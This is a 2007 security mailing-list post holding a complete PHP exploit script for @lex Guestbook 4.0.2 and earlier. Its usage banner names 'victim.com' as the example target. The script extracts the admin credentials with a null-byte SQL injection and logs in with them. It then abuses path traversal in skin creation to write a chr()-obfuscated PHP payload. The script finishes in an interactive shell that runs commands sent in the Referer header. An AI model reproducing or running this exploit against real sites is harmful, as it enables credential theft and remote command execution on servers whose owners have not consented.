@lex Guestbook <= 4.0.2 Remote Command Execution Exploit Jan 07 2007 08:52AM
gmdarkfig gmail com
#!/usr/bin/php
<?php

/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");

/*/
|
| header> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit
| header> ========================================================
| status> Retrieving the administrator password
| sploit> AdminUsername::root
| sploit> AdminPassword::toor
| status> Trying to get logged in
| sploit> Done
| status> Trying to add a skin
| sploit> Done
| status> Writing the malicious skin
| $shell> whoami
| darkfig
|
| $shell> cat /etc/passwd ...
|
/*/

if($argc < 2)
{
print "\n---------------------------------------------------------";
print "\nAffected.scr..: @lex Guestbook <= 4.0.2"; // last version
print "\nPoc.ID........: 20070107";
print "\nType..........: PHP Code Execution";
print "\nRisk.level....: High";
print "\nSrc.download..: www.alexphpteam.com";
print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url>";
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
print "\n---------------------------------------------------------\n";
exit(1);
}

$url=$argv[1];
$prs=$argv[2];
$pra=$argv[3];

$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);

/*/
|
| index.php
| =========
| ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
|
|
| livre_include.php -> Local File Inclusion
| =================
| ... set_magic_quotes_runtime(0); // thx =)
| ... if (isset($_GET['lang']) && $_GET['lang'] && file_exists($chem_absolu."languages/".$_GET['lang'].".".$alex_livre_ext)
)
| $f_language = str_replace("..","",$_GET['lang']); // We can't use .... because of file_exists() verification but ... =]
| include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
|
|
| index.php -> SQL Injection
| =========
| ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'");
| // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre`
|
/*/

$sql = "index.php?lang=english.php%00'%20union%20select%20".
"concat('XPLLogin:',(select%20login%20from%20alex_livr".
"e_users%20LIMIT%201),'XPLPass:',(select%20pass%20from".
"%20alex_livre_users%20LIMIT%201))/*";

print "\nheader> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit";
print "\nheader> ========================================================";
print "\nstatus> Retrieving the administrator password";
$xpl->get($url.$sql);

if(preg_match('#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#',$xpl->getcontent(),$co
unt))
print "\nsploit> AdminUsername::".$count[1]."\nsploit> AdminPassword::".$count[2];
else die("\nsploit> Exploit failed");

print "\nstatus> Trying to get logged in";
$xpl->post($url."admin/index.php","f_login=".$count[1]."&f_pass=".$count
[2]."&f_identif=Identification");
if(preg_match("#f_cadres\.php\?f_sid=([a-z0-9]{32})#",$xpl->getheader(),
$sid)) print "\nsploit> Done";
else die("\nsploit> Exploit failed");

print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755)
$xpl->post($url."admin/skins.php?f_sid=".$sid[1],"aj_skin=../../language
s/d4h4x0rskin&ajouter=Ajouter");
if(!preg_match('#alert\("ERREUR\n#',$xpl->getcontent())) print "\nsploit> Done";
else die("\nsploit> Exploit failed");

$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d).".
"chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).".
"chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).".
"chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45).".
"chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27).".
"chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52).".
"chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52).".
"chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)";

$data = "skin_edit=skins.php%3Ff_sid%3D".$sid[1]."%26skin_edit".
"%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e".
"val($scode);exit(0);\r\n?>&add_message=&nb_message_pa".
"ge=&list_pages=&corps_messages=&space=&assembly=&enre".
"gistrer=Enregistrer";

print "\nstatus> Writing the malicious skin\n\$shell> ";
// skins.php ... write($chem_absolu."templates/skins/".$_GET['skin_edit']."/".$tab_templa
te_guestbook[$i])
$xpl->post($url."admin/skins.php?skin_edit=../../languages/d4h4x0rskin&f
_sid=".$sid[1],$data);

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
$xpl->addheader("Referer",$cmd);
$xpl->get($url."index.php?lang=d4h4x0rskin/alex_livre.css%00");
print $xpl->getcontent();
print "\n\$shell> ";
}

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus